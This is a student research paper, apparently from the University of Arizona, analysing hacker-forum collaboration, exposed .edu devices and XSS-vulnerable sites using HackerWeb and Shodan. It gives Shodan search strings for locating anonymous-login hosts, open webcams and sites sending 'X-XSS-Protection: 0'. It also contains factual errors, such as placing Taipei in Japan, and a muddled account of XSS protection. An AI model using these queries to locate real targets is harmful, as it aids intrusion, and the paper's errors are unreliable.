10
Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks Krittika Patil Eller College of Management University of Arizona [email protected] Karan Dhingra Eller College of Management University of Arizona [email protected] Damini Khurana Eller College of Management University of Arizona [email protected] Akash Agrawal Eller College of Management University of Arizona [email protected] Introduction Research was executed by University of Arizona, MIS Graduate Students in an attempt to understand the current cyber security vulnerabilities, the potential risks associated with the vulnerabilities and the past events in the line of attack. The scope of the research was to explore cyber threats across domains. In total, Hacker Web and Shodan were used as a data source. This report and its appendices fully describe the network environment, the devices/websites connected thereto, and the results of the research conducted. A brief summary of the key findings and their priorities are given here. The priority for a finding was determined by the combination of the worst case impact if the finding’s vulnerability [if exploited] and the likelihood of the finding’s vulnerability being exploited. The impact and likelihood for a particular finding were determined based on analysis of the Websites and web applications are one of, if not the leading target of cyber-attack. Research Questions 1) Hackers have traditionally collaborated using strong communities, extending mutual support and building a sense of ‘hacker ethic’. No longer restricted by geographical location, hacker communities are now online and mostly group themselves by language and area of interest. HackerWeb offers a goldmine of information to study the hierarchal and collaborative structure of these forums. This paper elaborates on: The extent of collaboration between hackers in the different hackerweb forums, based on language of the forum A comparison of the social structures of the forums based on language of the forum The different kinds of hierarchies seen in hacker forums 2) In the vast education domain, digital information is critical to the functioning of institutions, as well as to feed research. With their interrelated organizational structure, traditional security ‘boundaries’ might not be

Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

  • Upload
    others

  • View
    18

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Krittika Patil

Eller College of Management University of Arizona

[email protected]

Karan Dhingra Eller College of Management

University of Arizona [email protected]

Damini Khurana Eller College of Management

University of Arizona [email protected]

Akash Agrawal Eller College of Management

University of Arizona [email protected]

Introduction Research was executed by University of Arizona, MIS Graduate Students in an attempt to understand the current cyber security vulnerabilities, the potential risks associated with the vulnerabilities and the past events in the line of attack. The scope of the research was to explore cyber threats across domains. In total, Hacker Web and Shodan were used as a data source. This report and its appendices fully describe the network environment, the devices/websites connected thereto, and the results of the research conducted. A brief summary of the key findings and their priorities are given here. The priority for a finding was determined by the combination of the worst case impact if the finding’s vulnerability [if exploited] and the likelihood of the finding’s vulnerability being exploited. The impact and likelihood for a particular finding were determined based on analysis of the Websites and web applications are one of, if not the leading target of cyber-attack.

Research Questions

1) Hackers have traditionally collaborated using strong communities, extending mutual support and building a sense of ‘hacker ethic’. No longer restricted by geographical location, hacker communities are now online and mostly group themselves by language and area of interest. HackerWeb offers a goldmine of information to study the hierarchal and collaborative structure of these forums. This paper elaborates on:

The extent of collaboration between hackers

in the different hackerweb forums, based on language of the forum

A comparison of the social structures of the forums based on language of the forum

The different kinds of hierarchies seen in hacker forums

2) In the vast education domain, digital information is

critical to the functioning of institutions, as well as to feed research. With their interrelated organizational structure, traditional security ‘boundaries’ might not be

Page 2: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

a practical option, exposing educational servers and data to savvy cyber attacks, potentially enabling theft of precious research, identity and even financial data, exposing an unlikely ‘industry’ to the dark side of the internet (Marc Gaffan, . N.p., n. d. 25 Feb 2014 <http://www.incapsula.com/blog/top-security-threats-and-attackers-by-country.html>). Through the use of Shodan, we aim to discuss: What are trends in susceptible devices/servers in the education domain?

a. Over a period of time, educational institutions of which countries are most vulnerable to this attack?

b. Extrapolating the trends in volumes of potentially susceptible devices to the near future, can we predict how these volumes will increase/decrease?

3) A) The increasingly popular and particularly malicious

XSS attack can lead to theft of credit card information, user credentials and even redirect users to malware-hosting domains. Through this question, we aim to understand the concentration of xss vulnerable devices as a function of the distribution of internet-enabled devices across the world:

What is the correlation between Cross Site Scripting Vulnerability and the Number of Internet Users of various countries?

Do XSS vulnerable device volumes increase with increasing internet penetration? Or are the patterns mutually exclusive?

B) Webcams and IP cameras are especially exposed to remote viewing and control, as clearly demonstrated through their prevalence on Shodan. Backdoors are easily installed since passwords are often left on default settings, protective settings are not turned on, and users are not sufficiently aware of these loopholes, leaving them exposed to voyeurism, theft and malicious targeting. Building on the correlations discussed above, the questions we explore in the webcam context are:

Does vulnerability volume relate to the volume of internet using devices? Or the penetration percentages? Or is it more a factor of seemingly unrelated economic status?

In a more positive context, is the trend of using internet-enabled cameras more prevalent in countries with a high internet-penetration percentage?

Comparing within a list of under-developed, developing and developed countries, can we

prove any correlations between standards of living and the prevalence of vulnerable net-cams?

C) How do the several parameters discussed above (standard of living webcam usage, internet penetration etc.) fare when compared to each other?

Literature Review Know Your Enemy: The Social Dynamics of Hacking – Holt, Kilger (2012) This paper series performs an in depth analysis of the social aspect of hacker forums. Extensive research has been conducted on the technological aspect of hacking. However, there is relatively little information on the human element of hacker forums. Understanding the social dynamics of a forum can provide us with insight into how hacking information is transmitted through these forums. The paper describes various characteristics observed in hacker forums like the ‘composition of skill’, the ‘social relationships in the hacker subculture’ and the ‘motivations for hacking’.

Cross-Site Scripting Worms & Viruses - The Impending Threat & the Best Defense - Jeremiah Grossman, Founder and CTO, WhiteHat Security (2012)

Cross Site Scripting is among the two most prevalent vulnerability classes. A white paper describes how there has been an advent of XSS attacks, while another describes how Cross Site Scripting along with SQL Injection has captured top two spots among vulnerabilities across all the countries in the world. XSS exploit code, written in Javascript, executes within the web browser and enables theft of web browser cookies, which can be used to hack online user accounts.

Client-side cross-site scripting protection (30 April 2009) - Engin Kirda, Nenad Jovanovic, Christopher Kruegel, Giovanni Vigna

This paper outlines the use of a tool Noxes that protects clients from XSS attacks. The paper outlines the different types and methods of XSS attacks and how Noxes can protect a client machine from such attacks. The tool acts like a web proxy sitting on top of the web browser through which normal requests pass through. Any malicious worm/Trojan can be detected by the tool, which acts as a personal firewall. In this way the risks from XSS attacks can be mitigated.

Page 3: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Universities UK (2013). Cyber security and universities: managing the risk. Retrieved from http://www.universitiesuk.ac.uk/highereducation/Documents/2013/CyberSecurityAndUniversities.pdf This paper discusses higher education institutions’ increased exposure to cyber attacks, and reasons for the vulnerabilities. It goes on to suggest methods to safeguard university servers and data from malicious attack, presenting comprehensive solutions and a data management plan. PÉREZ-PEÑA, R. (2013, July 16). Universities Face a Rising Barrage of Cyberattacks. The New York Times [New York]. Retrieved from http://www.nytimes.com/2013/07/17/education/barrage-of-cyberattacks-challenges-campus-culture.html?pagewanted=all&_r=0 This article was instrumental in enabling us to realize the increasing trends in cyber attacks on educational institutions and the types of attacks being reported recently.

What follows is a question-based breakdown of the procedure used to find answers to the questions listed earlier.

I] Hackers have traditionally collaborated using strong communities, extending mutual support and building a sense of ‘hacker ethic’. No longer restricted by geographical location, hacker communities are now online and mostly group themselves by language and area of interest. HackerWeb offers a goldmine of information to study the hierarchal and collaborative structure of these forums. This paper elaborates on:

The extent and methods of collaboration between hackers in the different hackerweb forums, based on language of the forum

Research Design Using the MySQL database of HackerWeb, we attempted to extract the threads on which multiple users of the forum have collaborated. Each thread comprises of multiple posts, each post being associated with a user(author) of the forum. Using simple SQL queries, we extracted the list of threads on each forum along with the users who have posted in each of these threads. We found that a large number of users in the forums were ‘non-participative’. A non-participative user is defined as one who has made fewer than 5 posts. In order to get an accurate representation of the forum, we decided to filter these users out

for our analysis. A more accurate representation of each forum can be attained by looking at only those users who are sufficiently active on the forum. Once we had these threads and users, we performed social network analysis on the dataset using the tool Gephi. We used the ‘Force Atlas’ algorithm for visulizing the social network. Gephi uses the authors as ‘nodes’ and builds ‘edges’ between two authors who have posted on the same thread. The thickness of the edge represents the extent of communication between two authors. The resulting graph consisting of all the authors(excluding the non-participative) shows that most forums’ users form a number of small communities. Some users(probably the experienced ones) are part of several such communities. We grouped the forums based on the language spoken in them. The languages used were English, Russian, Arabic and Chinese(Mandarin). We also wrote SQL queries to extract the reputation scores of each user on each forum. We did not want to compare across forums, but instead understand the different kinds of hierarchies that are followed on hacker forums. A hierarchy indicates the way the information flows in a forum. A strict hierarchy would indicate that only a few users are dominating the posting of information. On the other hand, an absence of strict hierarchy would indicate that information is flowing in all directions without an ostensible order. After extracting the information from the Hackerweb database, we used the reputation scores as inputs to Gephi to construct visualizations.

Findings and Discussion An example of each of the language-based groups is shown below along with the ‘average degree’ of the graph:

Hackhound(English forum)- Average Degree 2.18

Page 4: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Xakepok(Russian forum)- Average Degree 1.138

Hackdark(Chinese forum)- Average degree- 1.779

Mihandownload(Arabic forum)- Average degree 0.979

As can be seen, the English forum Hackhound does not consist of a clear structure. The communication between authors seems unstructured and there are no clear clusters or communities being formed. This is indicative of a highly collaborative environment. The average degree for Hackhound is 2.18, which means that each user, on average, collaborates with 2.18 other

users. In comparison with the other forums, this is a very high value. The blue dots indicate the users that have a high out-degree. There are a large number of users with blue dots in Hackhound. This indicates that there is no clear hierarchy in the forum. The Russian forum Xakepok is somewhat structured with two major communities being formed. It can also be seen that there is one user who is extremely influential in the forum, represented by the blue dot in the centre. It seems that all the information exchange goes through this one user. It is possible that this user is the moderator of the forum. Each of the clusters formed also have an internal point of contact to whom they all respond. It can be inferred that there exists a strict hierarchy in this forum. The central author is at the top of the hierarchy. The internal points of contact are below the central author, while the other users form the lowest tier. The average degree of this forum is 1.138, indicating a lower level of collaboration as is evident from the structure of the graph. Hackdark, the Chinese forum, has a very mixed structure. While there are a few clear clusters, there also exist a large number of individual users involved in highly collaborative work. There is a clear, dark blue dot with edges going out in all directions. This user is similar to the one seen in Xakepok. However, he handles a much larger number of disparate clusters and individual users. This person could be the moderator as well. The reason this forum differs from Xakepok is due to the absence of a second tier in the hierarchy. The clusters do not have an internal point of contact. The collaboration inside the clusters is mixed with no clear leader. The average degree of this graph is 1.779. It is a value between Hackhound’s and Xakepok’s, and indicates a mix of high collaboration along with clear cluster formation. Mihandownload, the Arabic forum, has the most distinct clusters of all the forums in HackerWeb. The average degree is only 0.979, indicating a very low degree of collaboration. There is no hierarchy in this forum, as seen from the absence of any central node. However, each cluster has a central node around which the collaboration seems to take place. Further, some of the clusters are loosely interconnected, but most have no common members at all. This is indicative of a very strict community culture. The difference in average degree based on the language used in the forum is as shown in the table below:

Language Average Degree English 1.818 Russian 1.253 Arabic 1.251

Chinese 1.430

Page 5: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

The values shown in the table above are calculated by taking the average of the average degrees in all the forums for that language. It can be seen that English forums have the highest level of collaboration, while Arabic forums have the least.

Further, we found two main kinds of hierarchies, shown below:

Centralized Hierarchy

Distributed Hierarchy

As shown, there are two general hierarchy structures, which we classify as ‘centralized’ and ‘distributed’. In the centralized hierarchy, there are typically less than 3 users (represented by the larger nodes) having extremely high reputation scores. These are the users that disseminate information to the other users in the forum. In the distributed hierarchy, there are several users with high reputation scores. This implies that information is disseminated without any strict structure or order.

II] In the vast education domain, digital information is critical to the functioning of institutions, as well as to feed research. With their interrelated organizational structure, traditional security ‘boundaries’ might not be a practical option, exposing educational servers and data to savvy cyber attacks, potentially enabling theft of precious research, identity and even financial data, exposing an unlikely ‘industry’ to the dark side of the internet. Through the use of Shodan, we aim to discuss: What are trends in susceptible devices/servers in the education domain?

a) Over a period of time, educational institutions of which countries are most vulnerable to this attack?

b) Extrapolating the trends in volumes of potentially susceptible devices to the near future, can we predict how these volumes will increase/decrease?

Research Design The Research Design included two main sources: Hacker Web and Shodan. Collection of data was in 2 phases with the focus on discovering potentially vulnerable devices/websites/servers hosted on educational domains. Firstly, we collected data from Shodan by finding the devices that are filtered by hostname:.edu, also filtering OUT ones that do return a 400 series (denial) response, and Secondly, restricting results to those devices where ‘Anonymous Login’ was successful. The result set of the Shodan search engine was extracted using Python through the Shodan API, based on the search query described above. Analysis: A)A Python code was used to export Shodan result parameters containing location information like longitude, latitude, city, country code, to a CSV file to facilitate analysis and visualization. The data collected through the Shodan API was analyzed through Tableau to comprehend the distribution of this vulnerability across educational centres in cities across the world, using a Filled Map to superimpose color density distribution on the World Map. B)In an attempt to study the increasing/decreasing trends in vulnerable devices in the education domain, we used another Python script to retrieve the dates at which these vulnerable devices were picked up by Shodan, using the ‘after’ tag to limit results to recent years, and subsequently exporting the results to MS Excel.

Page 6: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

The raw data exported was cleaned and grouped by dates, using Excel Pivot tables. Presenting the findings on a scatter plot, a Regression Analysis was run on the results, using Excel’s Data Analysis ToolPak. The trend was found to be best suited as a polynomial (degree 2) function, instead of a linear function of

time. The equation thus generated has been used to predict count of vulnerable devices that would likely be found in the near future. For the prediction analysis, ‘Date’ has been converted to a numerical value, described as the ‘day number’, starting from first day for which data is available.

Findings and Discussion

Page 7: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

A)The above charts and figures clearly depict a concentration of vulnerabilities in a few prominent educational cities; finding a large hub in Taipei in Japan - a city that boasts of a large number of prestigious universities, with no less than 8 universities ranked among the top universities in the world (source: 2013/14 QS World University Rankings). Seattle, also a prominent city and a celebrated educational center is also high on the list of having an alarmingly large number of susceptible devices. On the other hand, Chicago, also a very large educational hub, housing more than 10 major universities, has seen surprisingly low exposed devices, leading us to conclude that these have

better protective and preventive measures in place to protect precious research. B) Using the data unearthed by an analysis of the volume of exposed devices over a timeline, we observed a clear and sharp increase in devices found over the last month, an increasing trend that has been continuing over from October 2013. The increasing trend was preceded by a low plateau over the last year. Extrapolating the results, we predicted a continuing increase, with more and more devices being unearthed over March and April. Prediction has been limited to a few months in the future to preserve likelihood of accuracy.

DATE NO. OF DEVICES

FOUND … …

2/15/2014 29 2/16/2014 48 2/17/2014 35 2/18/2014 44 2/19/2014 61 2/20/2014 58 2/21/2014 46 2/22/2014 84 2/23/2014 71 2/24/2014 16 3/6/2014 28.314 3/16/2014 30.752 3/26/2014 33.29

III] A) The increasingly popular and particularly malicious XSS attack can lead to theft of credit card information, user credentials and even redirect users to malware-hosting domains. Through this question, we aim to understand the concentration of xss vulnerable devices as a function of the distribution of internet-enabled devices across the world:

What is the correlation between Cross Site Scripting Vulnerability and the Number of Internet Users of various countries?

Do XSS vulnerable device volumes increase with increasing internet penetration? Or are the patterns mutually exclusive?

B) Webcams and IP cameras are especially exposed to remote viewing and control, as clearly demonstrated through their prevalence on Shodan. Backdoors are easily installed since passwords are often left on default settings, protective settings are not turned on, and users are not sufficiently aware of these loopholes, leaving them exposed to voyeurism, theft and

Page 8: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

malicious targeting. Building on the correlations discussed above, the questions we explore in the webcam context are:

Does vulnerability volume relate to the volume of internet using devices? Or the penetration percentages? Or is it more a factor of seemingly unrelated economic status?

In a more positive context, is the trend of using internet-enabled cameras more prevalent in countries with a high internet-penetration percentage?

Comparing within a list of under-developed, developing and developed countries, can we prove any correlations between standards of living and the prevalence of vulnerable net-cams?

C) How do the several parameters discussed above (standard of living webcam usage, internet penetration etc.) fare when compared to each other?

Research Design By querying Hacker web and analyzing the posts through Rapid Miner tool for text mining, it was found that XSS attacks were one of the common tool used by hackers to explore the web application layer vulnerabilities to achieve malicious results such as identity theft and accessing sensitive and restricted information. This led to the selection of XSS attacks as a field of study. If a browser has the parameter X-XSS-Protection set to 1 then it is not vulnerable to XSS attacks. This is the default browser setting. However, if this setting is changed to X-XSS-Protection: 0; then the browser can be prone to XSS attacks. In our research, we are analyzing the association between XSS attacks, Internet Penetration and Standard of Living. Standard of Living rating and Internet Penetration rating of various countries was got from the following sources:

http://www.numbeo.com/quality-of-life/rankings_by_country.jsp and http://www.itu.int/(aggregated by http://en.wikipedia.org/)

The Analysis design for this research consisted of following steps:

1) Searching the devices/websites that are vulnerable to XSS attacks through Shodan API using the search string “X-XSS-Protection: 0;.”

2) Parsing the results of Shodan on country parameter using Python code as attached in the screenshot.

3) Choosing the relevant countries such that there is an equal distribution in the segments based on Internet Penetration and Number of Internet Users along with XSS vulnerable sites.

4) Created a pivot to determine distribution of vulnerable devices by country.

5) Also to capture the association with vulnerable webcams and internet penetration the following steps were followed:

a) Conducted a search on Shodan through Shodan API to find the vulnerable webcams with the search string “webcam http 200 ok”

b) Segregated them based on countries, latitude and longitude by parsing through Shodan using Python.

c) The results were automatically populated to a spreadsheet through Shodan API.

d) Created a pivot to determine count of vulnerable webcams.

Findings and Discussion The below chart depicts the correlation between the number of Internet Users, Internet Penetration and XSS vulnerable devices and vulnerable webcams. After finding the count of vulnerable XSS devices and webcams, we plotted a correlation matrix to capture the association between internet penetration and XSS vulnerable devices. The findings are shown in the table below. It is evident from the correlation matrix that there is a maximum positive correlation (0.95) between Internet Penetration and XSS vulnerable devices and it proves that as the Internet penetration in various countries increase there is an equivalent or more increase in vulnerable XSS devices and attacks .

We plotted another graph to find the correlation between standard of living between various countries and vulnerable webcams and found a positive correlation (0.71). This makes it evident that in the countries where there is high standard of living, there is an increase in internet enabled cameras. Which leaves such devices susceptible to cyber attacks and cyber vulnerabilities.

Page 9: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Acknowledgments We would like to extend special appreciation to advisor Professor Dr. Chen and University of Arizona’s AI Lab for providing Shodan and HackerWeb data sets to facilitate our research, as well as for their constant guidance and support. We would also like to acknowledge the authors of the large number of white-papers, news articles and discussion blogs that were instrumental in helping us frame hypotheses, source data and form the basis for research topics.

XSS

Vulnerable Devices

Internet Penetration

XSS Vulnerable

Devices 1

Internet Penetration 0.958641529 1

No of Internet Users 0.791323743 0.58458

Vulnerable Webcams 0.73011927 0.894406563

Vulnerable Webcams

Standard of Living

Vulnerable Webcams 1

Standard of Living 0.713099804 1

XSS Vulnerable DevicesNo of Internet Users

050000000

100000000

150000000

200000000

250000000

300000000

Indi

aIra

nRu

ssia

USGe

rman

yUn

ited

King

dom

Japa

nEg

ypt

Correlation Chart

XSS Vulnerable DevicesInternet PenetrationNo of Internet UsersVulnerable Webcams

Vulnerable Webcams-500

0

500

1000

Correlation between Vulnerable webcams and Standard of Living of

Countries

Vulnerable Webcams Standard of Living

Page 10: Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

REFERENCES

[1] Universities UK (2013). Cyber security and universities: managing the risk.Retrieved from http://www.universitiesuk.ac.uk/highereducation/Documents/2013/CyberSecurityAndUniversities.pdf

[2] PÉREZ-PEÑA, R. (2013, July 16). Universities Face a Rising Barrage of Cyberattacks. The New York Times [New York]. Retrieved from http://www.nytimes.com/2013/07/17/education/barrage-of-cyberattacks-challenges-campus-culture.html?pagewanted=all&_r=0

[3] http://www.numbeo.com/quality-of-life/rankings_by_country.jsp [4] http://www.itu.int/(aggregated by http://en.wikipedia.org/) [5] http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks/ [6] http://www.hpenterprisesecurity.com/collateral/report/2011FullYearCyberSecurityRisksReport.pdf [7] http://www.nowires.org/Papers-PDF/ICGeS_egov.pdf [8] https://bora.uib.no/bitstream/handle/1956/1901/Paper_7_Moen.pdf?sequence=36 [9] http://praetorianprefect.com/archives/2010/10/paypal-sender-country-xss/ [10] http://www.numbeo.com/quality-of-life/rankings_by_country.jsp